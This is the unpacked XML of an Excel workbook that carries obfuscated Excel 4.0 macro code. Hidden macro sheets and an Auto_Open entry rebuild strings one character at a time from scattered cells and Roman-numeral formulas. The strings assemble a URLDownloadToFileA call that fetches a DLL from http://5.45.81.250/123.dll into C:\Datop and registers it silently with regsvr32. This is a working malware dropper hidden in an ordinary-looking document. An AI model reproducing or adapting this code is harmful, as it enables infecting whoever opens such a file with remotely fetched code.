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macrosheets/intlsheet1.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet2.xml" ContentType="application/vnd.ms-excel.intlmacro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macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet2.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet3.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet4.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet5.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet6.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet7.xml" ContentType="application/vnd.ms-excel.macro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Админ\Desktop\Fil\2n\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{371FD793-6BD4-46B9-A215-06959B422D48}" xr6:coauthVersionLast="45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q1" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="Derdw1" sheetId="13" state="hidden" r:id="rId2"/>
    <sheet name="Sheet" sheetId="4" r:id="rId3"/>
    <sheet name="REREWEDWF" sheetId="14" state="hidden" r:id="rId4"/>
    <sheet name="Shq2" sheetId="2" state="hidden" r:id="rId5"/>
    <sheet name="Shq3" sheetId="3" state="hidden" r:id="rId6"/>
    <sheet name="Vgq1" sheetId="5" state="hidden" r:id="rId7"/>
    <sheet name="Vgq2" sheetId="6" state="hidden" r:id="rId8"/>
    <sheet name="Vgq3" sheetId="7" state="hidden" r:id="rId9"/>
    <sheet name="Vgq4" sheetId="8" state="hidden" r:id="rId10"/>
    <sheet name="Vgq5" sheetId="10" state="hidden" r:id="rId11"/>
    <sheet name="Vgq6" sheetId="11" state="hidden" r:id="rId12"/>
    <sheet name="Vgq7" sheetId="12" state="hidden" r:id="rId13"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">REREWEDWF!$C$1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2" l="1"/>
  <c r="B20" i="2"/>
  <c r="O3" i="3"/>
  <c r="I12" i="2"/>
  <c r="R21" i="2"/>
  <c r="Q8" i="3"/>
  <c r="S70" i="1"/>
  <c r="G77" i="1"/>
  <c r="C68" i="1"/>
  <c r="H57" i="1"/>
  <c r="L7" i="2"/>
  <c r="K70" i="1"/>
  <c r="R11" i="2"/>
  <c r="M18" i="2"/>
  <c r="G1" i="2"/>
  <c r="L10" i="3"/>
  <c r="E2" i="2"/>
  <c r="E7" i="3"/>
  <c r="J2" i="2"/>
  <c r="O3" i="2"/>
  <c r="S4" i="2"/>
  <c r="C5" i="2"/>
  <c r="H5" i="2"/>
  <c r="M5" i="2"/>
  <c r="Q6" i="2"/>
  <c r="G4" i="3"/>
  <c r="A8" i="2"/>
  <c r="D10" i="2"/>
  <c r="F11" i="2"/>
  <c r="O12" i="2"/>
  <c r="B13" i="2"/>
  <c r="K14" i="2"/>
  <c r="R15" i="2"/>
  <c r="E16" i="2"/>
  <c r="R65" i="1"/>
  <c r="O66" i="1"/>
  <c r="F69" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="60" uniqueCount="44">
  <si>
    <t>K</t>
  </si>
  <si>
    <t>e</t>
  </si>
  <si>
    <t>r</t>
  </si>
  <si>
    <t>n</t>
  </si>
  <si>
    <t>l</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>a</t>
  </si>
  <si>
    <t>t</t>
  </si>
  <si>
    <t>D</t>
  </si>
  <si>
    <t>i</t>
  </si>
  <si>
    <t>c</t>
  </si>
  <si>
    <t>o</t>
  </si>
  <si>
    <t>y</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>J</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>p</t>
  </si>
  <si>
    <t>u</t>
  </si>
  <si>
    <t>m</t>
  </si>
  <si>
    <t>U</t>
  </si>
  <si>
    <t>R</t>
  </si>
  <si>
    <t>L</t>
  </si>
  <si>
    <t>w</t>
  </si>
  <si>
    <t>d</t>
  </si>
  <si>
    <t>T</t>
  </si>
  <si>
    <t>F</t>
  </si>
  <si>
    <t>s</t>
  </si>
  <si>
    <t>\</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>:</t>
  </si>
  <si>
    <t>"</t>
  </si>
  <si>
    <t>,</t>
  </si>
  <si>
    <t>=</t>
  </si>
  <si>
    <t>(</t>
  </si>
  <si>
    <t>)</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>E</t>
  </si>
  <si>
    <t>X</t>
  </si>
  <si>
    <t>g</t>
  </si>
  <si>
    <t>v</t>
  </si>
  <si>
    <t>f</t>
  </si>
  <si>
    <t>N</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>"h"&amp;"t"&amp;"t"&amp;"p://5.45.81.250/123.d"&amp;"l"&amp;"l",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</si>
</sst>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6/relationships/xlMacrosheet" Target="macrosheets/sheet2.xml"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet7.xml"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet1.xml"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet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microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet5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microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet4.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet2.xml"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet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</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4624387</xdr:colOff>
      <xdr:row>32</xdr:row>
      <xdr:rowOff>187055</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="8" name="PICTURE">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12FE959B-8F1E-4709-850B-3BF9490E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0058400" cy="6283055"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/macrosheets/_rels/intl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macrosheets/intlsheet1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dimension ref="A1"/>
  <sheetViews>
    <sheetView showFormulas="1" tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="6.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="6.140625" style="2"/>
    <col min="2" max="2" width="255.7109375" style="2" bestFit="1" customWidth="1"/>
    <col min="3" max="16384" width="6.140625" style="2"/>
  </cols>
  <sheetData/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <drawing r:id="rId1"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet2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346C3613-288F-4FD4-A1F2-68D26AEB8B68}">
  <dimension ref="C11"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="5" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="5" style="1"/>
  </cols>
  <sheetData>
    <row r="11" spans="3:3" x14ac:dyDescent="0.25">
      <c r="C11" s="1" t="b">
        <f>FORMULA.FILL()=FORMULA.ARRAY()=FORMULA.FILL()=FORMULA.FILL('Vgq2'!F9,'Vgq3'!H4)=FORMULA('Vgq4'!I6,'Vgq5'!I6)=FORMULA.ARRAY()=FORMULA('Vgq1'!D13,'Vgq2'!B2)=FORMULA('Vgq3'!C11,'Vgq4'!A9)="&amp;"=FORMULA('Vgq6'!D8,'Vgq7'!I5)=FORMULA('Shq1'!D43&amp;'Shq1'!D45&amp;'Vgq3'!H4&amp;'Shq1'!D48&amp;'Shq1'!D48&amp;'Shq1'!D50&amp;'Shq2'!C5&amp;'Vgq5'!I6&amp;'Shq3'!E7&amp;'Vgq5'!I6&amp;'Shq1'!E2&amp;'Shq1'!B12&amp;'Shq1'!F9&amp;'Shq1'!E2&amp;'Shq1'!R7&amp;'Shq1'!J11&amp;'Vgq5'!I6&amp;'Shq1'!E2&amp;'Shq1'!C15&amp;'Shq1'!F9&amp;'Shq1'!M1&amp;'Vgq5'!I6&amp;'Shq3'!G4,C60)=FORMULA()=FORMULA('Shq1'!D43&amp;'Shq1'!D45&amp;'Vgq3'!H4&amp;'Shq1'!D48&amp;'Shq1'!D48&amp;'Shq1'!D50&amp;'Shq1'!F34&amp;'Shq1'!L9&amp;'Vgq5'!I6&amp;'Shq1'!A1&amp;'Shq1'!K14&amp;'Shq1'!M1&amp;'Shq1'!A11&amp;'Shq1'!F34&amp;'Shq1'!F37&amp;'Shq2'!S4&amp;'Vgq4'!A9&amp;'Shq2'!M5&amp;'Vgq2'!B2&amp;'Shq3'!Q8&amp;'Vgq7'!I5&amp;'Vgq7'!I5&amp;'Shq2'!I12&amp;'Shq3'!O3,C62)=FORMULA('Vgq5'!C9,'Vgq1'!I5)="&amp;"=FORMULA('Shq1'!D43&amp;'Vgq1'!I5&amp;'Shq1'!P36&amp;'Vgq1'!I5&amp;'Shq1'!P38&amp;'Shq1'!D50&amp;'Shq1'!F34&amp;'Shq1'!C8&amp;'Shq2'!O12&amp;'Shq1'!C8&amp;'Shq1'!I1&amp;'Shq1'!K5&amp;'Shq1'!G77&amp;'Shq2'!R15&amp;'Shq1'!G77&amp;'Shq2'!T9,C64)=FORMULA('Shq1'!D43&amp;'Shq1'!K122&amp;'Shq1'!K124&amp;'Shq1'!K126&amp;'Shq1'!K128&amp;'Shq1'!K122&amp;'Shq1'!J130&amp;'Shq1'!D50&amp;'Shq1'!D51,C70)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/sheet1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dimension ref="D13"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="13" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D13" s="1" t="str">
        <f>CHAR('Shq1'!F69)</f>
        <v>e</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/sheet2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dimension ref="F9"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="9" spans="6:6" x14ac:dyDescent="0.25">
      <c r="F9" s="1" t="str">
        <f>CHAR('Shq1'!K70)</f>
        <v>A</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/sheet3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dimension ref="C11"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="11" spans="3:3" x14ac:dyDescent="0.25">
      <c r="C11" s="1" t="str">
        <f>CHAR('Shq1'!O66)</f>
        <v>o</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/sheet4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800-000000000000}">
  <dimension ref="I6"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="6" spans="9:9" x14ac:dyDescent="0.25">
      <c r="I6" s="1" t="str">
        <f>CHAR('Shq1'!R65)</f>
        <v>r</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/sheet5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900-000000000000}">
  <dimension ref="C9"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="9" spans="3:3" x14ac:dyDescent="0.25">
      <c r="C9" s="1" t="str">
        <f>CHAR('Shq1'!C68)</f>
        <v>E</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/sheet6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A00-000000000000}">
  <dimension ref="D8"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="8" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D8" s="1" t="str">
        <f>CHAR('Shq1'!S70)</f>
        <v>C</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/sheet7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B00-000000000000}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macro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0"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>6</v>
      </c>
      <c r="I1" s="1">
        <v>3</v>
      </c>
      <c r="M1" s="1" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="2" spans="1:20" x14ac:dyDescent="0.25">
      <c r="E2" s="1" t="s">
        <v>1</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>12</v>
      </c>
      <c r="Q2" s="1" t="s">
        <v>14</v>
      </c>
      <c r="S2" s="1" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="3" spans="1:20" x14ac:dyDescent="0.25">
      <c r="T3" s="1">
        <v>5</v>
      </c>
    </row>
    <row r="4" spans="1:20" x14ac:dyDescent="0.25">
      <c r="B4" s="1" t="s">
        <v>0</v>
      </c>
      <c r="O4" s="1" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5" spans="1:20" x14ac:dyDescent="0.25">
      <c r="D5" s="1" t="s">
        <v>8</v>
      </c>
      <c r="K5" s="1">
        <v>2</v>
      </c>
      <c r="S5" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="6" spans="1:20" x14ac:dyDescent="0.25">
      <c r="G6" s="1" t="s">
        <v>5</v>
      </c>
      <c r="M6" s="1" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="7" spans="1:20" x14ac:dyDescent="0.25">
      <c r="E7" s="1" t="s">
        <v>40</v>
      </c>
      <c r="R7" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="8" spans="1:20" x14ac:dyDescent="0.25">
      <c r="C8" s="1" t="s">
        <v>2</v>
      </c>
      <c r="H8" s="1" t="s">
        <v>25</v>
      </c>
      <c r="P8" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="9" spans="1:20" x14ac:dyDescent="0.25">
      <c r="F9" s="1" t="s">
        <v>7</v>
      </c>
      <c r="I9" s="1" t="s">
        <v>39</v>
      </c>
      <c r="L9" s="1" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="10" spans="1:20" x14ac:dyDescent="0.25">
      <c r="N10" s="1" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="11" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A11" s="1" t="s">
        <v>3</v>
      </c>
      <c r="J11" s="1" t="s">
        <v>9</v>
      </c>
      <c r="S11" s="1" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="12" spans="1:20" x14ac:dyDescent="0.25">
      <c r="B12" s="1" t="s">
        <v>6</v>
      </c>
      <c r="E12" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:20" x14ac:dyDescent="0.25">
      <c r="O13" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:20" x14ac:dyDescent="0.25">
      <c r="K14" s="1" t="s">
        <v>18</v>
      </c>
      <c r="T14" s="1" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="15" spans="1:20" x14ac:dyDescent="0.25">
      <c r="C15" s="1" t="s">
        <v>10</v>
      </c>
      <c r="H15" s="1" t="s">
        <v>4</v>
      </c>
      <c r="R15" s="1" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="16" spans="1:20" x14ac:dyDescent="0.25">
      <c r="M16" s="1" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="18" spans="4:20" x14ac:dyDescent="0.25">
      <c r="F18" s="1" t="s">
        <v>23</v>
      </c>
      <c r="P18" s="1" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="19" spans="4:20" x14ac:dyDescent="0.25">
      <c r="J19" s="1" t="s">
        <v>22</v>
      </c>
      <c r="T19" s="1" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="26" spans="4:20" x14ac:dyDescent="0.25">
      <c r="O26" s="1" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="27" spans="4:20" x14ac:dyDescent="0.25">
      <c r="K27" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M27" s="1" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="29" spans="4:20" x14ac:dyDescent="0.25">
      <c r="K29" s="1" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="32" spans="4:20" x14ac:dyDescent="0.25">
      <c r="D32" s="1" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="34" spans="4:18" x14ac:dyDescent="0.25">
      <c r="F34" s="1" t="s">
        <v>30</v>
      </c>
      <c r="P34" s="1" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="36" spans="4:18" x14ac:dyDescent="0.25">
      <c r="P36" s="1" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="37" spans="4:18" x14ac:dyDescent="0.25">
      <c r="F37" s="1" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="38" spans="4:18" x14ac:dyDescent="0.25">
      <c r="P38" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="43" spans="4:18" x14ac:dyDescent="0.25">
      <c r="D43" s="1" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="45" spans="4:18" x14ac:dyDescent="0.25">
      <c r="D45" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="46" spans="4:18" x14ac:dyDescent="0.25">
      <c r="R46" s="1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="4:18" x14ac:dyDescent="0.25">
      <c r="D47" s="1" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="48" spans="4:18" x14ac:dyDescent="0.25">
      <c r="D48" s="1" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="50" spans="4:8" x14ac:dyDescent="0.25">
      <c r="D50" s="1" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="51" spans="4:8" x14ac:dyDescent="0.25">
      <c r="D51" s="1" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="57" spans="4:8" x14ac:dyDescent="0.25">
      <c r="H57" s="1" t="str">
        <f>CHAR(32)</f>
        <v xml:space="preserve"> </v>
      </c>
    </row>
    <row r="65" spans="3:19" x14ac:dyDescent="0.25">
      <c r="R65" s="1">
        <f>_xlfn.ARABIC("CXIV")</f>
        <v>114</v>
      </c>
    </row>
    <row r="66" spans="3:19" x14ac:dyDescent="0.25">
      <c r="O66" s="1">
        <f>_xlfn.ARABIC("CXI")</f>
        <v>111</v>
      </c>
    </row>
    <row r="68" spans="3:19" x14ac:dyDescent="0.25">
      <c r="C68" s="1">
        <f>_xlfn.ARABIC("LXIX")</f>
        <v>69</v>
      </c>
    </row>
    <row r="69" spans="3:19" x14ac:dyDescent="0.25">
      <c r="F69" s="1">
        <f>_xlfn.ARABIC("CI")</f>
        <v>101</v>
      </c>
    </row>
    <row r="70" spans="3:19" x14ac:dyDescent="0.25">
      <c r="K70" s="1">
        <f>_xlfn.ARABIC("LXV")</f>
        <v>65</v>
      </c>
      <c r="S70" s="1">
        <f>_xlfn.ARABIC("LXVII")</f>
        <v>67</v>
      </c>
    </row>
    <row r="77" spans="3:19" x14ac:dyDescent="0.25">
      <c r="G77" s="1" t="str">
        <f>CHAR(32)</f>
        <v xml:space="preserve"> </v>
      </c>
      <c r="H77" s="1" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="122" spans="11:11" x14ac:dyDescent="0.25">
      <c r="K122" s="1" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="124" spans="11:11" x14ac:dyDescent="0.25">
      <c r="K124" s="1" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="126" spans="11:11" x14ac:dyDescent="0.25">
      <c r="K126" s="1" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="128" spans="11:11" x14ac:dyDescent="0.25">
      <c r="K128" s="1" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="130" spans="10:10" x14ac:dyDescent="0.25">
      <c r="J130" s="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6D7A-157C-4D1D-A6E6-F185E06ABC32}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="H1" sqref="H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6"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:20" x14ac:dyDescent="0.25">
      <c r="G1" s="1" t="str">
        <f>TEXT('Shq1'!H15&amp;'Shq1'!K14&amp;'Shq1'!S11&amp;'Shq1'!A11&amp;'Shq1'!F34&amp;'Shq1'!F37,5)</f>
        <v>lmon",</v>
      </c>
    </row>
    <row r="2" spans="1:20" x14ac:dyDescent="0.25">
      <c r="E2" s="1" t="str">
        <f>TEXT('Shq1'!A11&amp;'Shq1'!E2&amp;'Shq1'!H15&amp;'Shq1'!I1&amp;'Shq1'!K5&amp;'Shq1'!F34&amp;'Shq1'!F37,6)</f>
        <v>nel32",</v>
      </c>
      <c r="J2" s="1" t="str">
        <f>TEXT('Shq1'!J2&amp;'Shq1'!O4&amp;'Shq1'!F34&amp;'Shq1'!F37,565)</f>
        <v>yA",</v>
      </c>
    </row>
    <row r="3" spans="1:20" x14ac:dyDescent="0.25">
      <c r="O3" s="1" t="str">
        <f>TEXT('Shq1'!F34&amp;'Shq1'!Q2&amp;'Shq1'!P8&amp;'Shq1'!Q2&amp;'Shq1'!F34&amp;'Shq1'!F37,44)</f>
        <v>"JCJ",</v>
      </c>
    </row>
    <row r="4" spans="1:20" x14ac:dyDescent="0.25">
      <c r="S4" s="1" t="str">
        <f>TEXT('Shq1'!F34&amp;'Shq1'!P18&amp;'Shq1'!R15&amp;'Shq1'!M16&amp;'Shq1'!D5&amp;'Shq1'!S11&amp;'Shq1'!J19&amp;'Shq1'!A11&amp;'Shq1'!H15&amp;'Shq1'!S11&amp;'Shq1'!B12&amp;'Shq1'!F18&amp;'Shq1'!T19,3)</f>
        <v>"URLDownloadT</v>
      </c>
    </row>
    <row r="5" spans="1:20" x14ac:dyDescent="0.25">
      <c r="C5" s="1" t="str">
        <f>TEXT('Shq1'!F34&amp;'Shq1'!B4&amp;'Shq1'!E2,3)</f>
        <v>"Ke</v>
      </c>
      <c r="H5" s="1" t="str">
        <f>TEXT('Shq1'!F34&amp;'Shq1'!P8,8)</f>
        <v>"C</v>
      </c>
      <c r="M5" s="1" t="str">
        <f>TEXT('Shq1'!H8&amp;'Shq1'!J11&amp;'Shq1'!A1,6)</f>
        <v>Fil</v>
      </c>
    </row>
    <row r="6" spans="1:20" x14ac:dyDescent="0.25">
      <c r="Q6" s="1" t="str">
        <f>TEXT('Shq1'!F34&amp;'Shq1'!G6&amp;'Shq1'!M27&amp;'Shq1'!K27&amp;'Shq1'!R7&amp;'Shq1'!H1&amp;'Shq1'!F9&amp;'Shq1'!M1&amp;'Shq1'!N10&amp;'Shq1'!F34&amp;'Shq1'!F37,44)</f>
        <v>"C:\Datop",</v>
      </c>
    </row>
    <row r="7" spans="1:20" x14ac:dyDescent="0.25">
      <c r="L7" s="1" t="str">
        <f>TEXT('Shq1'!C15&amp;'Shq1'!F9&amp;'Shq1'!M1,4)</f>
        <v>cto</v>
      </c>
    </row>
    <row r="8" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A8" s="1" t="str">
        <f>TEXT('Shq1'!F34&amp;'Shq1'!L9,1)</f>
        <v>"u</v>
      </c>
    </row>
    <row r="9" spans="1:20" x14ac:dyDescent="0.25">
      <c r="T9" s="1" t="str">
        <f>TEXT('Shq1'!G6&amp;'Shq1'!M27&amp;'Shq1'!K27&amp;'Shq1'!R7&amp;'Shq1'!H1&amp;'Shq1'!F9&amp;'Shq1'!M1&amp;'Shq1'!N10&amp;'Shq1'!K27&amp;'Shq1'!F9&amp;'Shq1'!E2&amp;'Shq1'!T14&amp;'Shq1'!F9&amp;'Shq1'!K29&amp;'Shq1'!F9&amp;'Shq1'!E2&amp;'Shq1'!T14&amp;'Shq1'!F9&amp;'Shq1'!F34&amp;'Shq1'!D51,44)</f>
        <v>C:\Datop\test.test")</v>
      </c>
    </row>
    <row r="10" spans="1:20" x14ac:dyDescent="0.25">
      <c r="D10" s="1" t="str">
        <f>TEXT('Shq1'!O4&amp;'Shq1'!F34&amp;'Shq1'!F37,8)</f>
        <v>A",</v>
      </c>
    </row>
    <row r="11" spans="1:20" x14ac:dyDescent="0.25">
      <c r="F11" s="1" t="str">
        <f>TEXT('Shq1'!O13&amp;'Shq1'!F37&amp;'Shq1'!O13&amp;'Shq1'!D51,2)</f>
        <v>0,0)</v>
      </c>
      <c r="R11" s="1" t="str">
        <f>TEXT('Shq1'!D5&amp;'Shq1'!J11,4)</f>
        <v>Di</v>
      </c>
    </row>
    <row r="12" spans="1:20" x14ac:dyDescent="0.25">
      <c r="I12" s="1" t="str">
        <f>_xlfn.CONCAT('Shq1'!S2&amp;'Shq1'!S2&amp;'Shq1'!F34&amp;'Shq1'!F37)</f>
        <v>BB",</v>
      </c>
      <c r="O12" s="1" t="str">
        <f>TEXT('Shq1'!E2&amp;'Shq1'!S5&amp;'Shq1'!M6&amp;'Shq1'!I9,22)</f>
        <v>egsv</v>
      </c>
    </row>
    <row r="13" spans="1:20" x14ac:dyDescent="0.25">
      <c r="B13" s="1" t="str">
        <f>CONCATENATE('Shq1'!O13,'Shq1'!F37)</f>
        <v>0,</v>
      </c>
    </row>
    <row r="14" spans="1:20" x14ac:dyDescent="0.25">
      <c r="K14" s="1" t="str">
        <f>TEXT('Shq1'!O13&amp;'Shq1'!F37&amp;'Shq1'!T3&amp;'Shq1'!D51,67)</f>
        <v>0,5)</v>
      </c>
    </row>
    <row r="15" spans="1:20" x14ac:dyDescent="0.25">
      <c r="R15" s="1" t="str">
        <f>TEXT('Shq1'!O26&amp;'Shq1'!M6&amp;'Shq1'!J11&amp;'Shq1'!A1&amp;'Shq1'!E2&amp;'Shq1'!A11&amp;'Shq1'!F9,48)</f>
        <v>-silent</v>
      </c>
    </row>
    <row r="16" spans="1:20" x14ac:dyDescent="0.25">
      <c r="E16" s="1" t="str">
        <f>TEXT('Shq1'!E7&amp;'Shq1'!J11&amp;'Shq1'!H15&amp;'Shq1'!E2&amp;'Shq1'!F34&amp;'Shq1'!D51,5)</f>
        <v>file")</v>
      </c>
    </row>
    <row r="18" spans="2:18" x14ac:dyDescent="0.25">
      <c r="M18" s="1" t="str">
